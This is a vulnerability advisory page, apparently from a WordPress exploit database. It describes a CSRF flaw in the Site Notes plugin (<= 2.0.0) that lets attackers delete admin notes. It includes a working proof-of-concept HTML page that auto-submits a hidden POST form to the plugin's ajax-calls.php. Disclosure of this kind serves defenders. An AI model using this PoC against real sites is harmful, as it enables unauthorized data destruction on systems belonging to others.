Lucene search

K
wpexploitPedro Cuco (Illex)WPEX-ID:EB983D82-B894-41C5-B51F-94D4BBA3BA39
HistoryJan 03, 2024 - 12:00 a.m.

Site Notes <= 2.0.0 - Admin Note Deletion via CSRF

2024-01-0300:00:00
Pedro Cuco (Illex)
27
site notes
admin
note deletion
csrf
html
exploit

6.8 Medium

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

17.0%

Description The plugin does not have CSRF checks in some of its functionalities, which could allow attackers to make logged in users perform unwanted actions, such as deleting administration notes, via CSRF attacks

Have an administrator open the following HTML file:

<html>
  <body>
    <form action="http://<TARGET-DOMAIN>/wp-content/plugins/site-notes/ajax-calls.php" method="POST">
      <input type="hidden" name="meta" value="note" />
      <input type="hidden" name="id" value="<POST_ID>" />
      <input type="hidden" name="value" value="DELETEALL!!" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

6.8 Medium

AI Score

Confidence

Low

0.0005 Low

EPSS

Percentile

17.0%

Related for WPEX-ID:EB983D82-B894-41C5-B51F-94D4BBA3BA39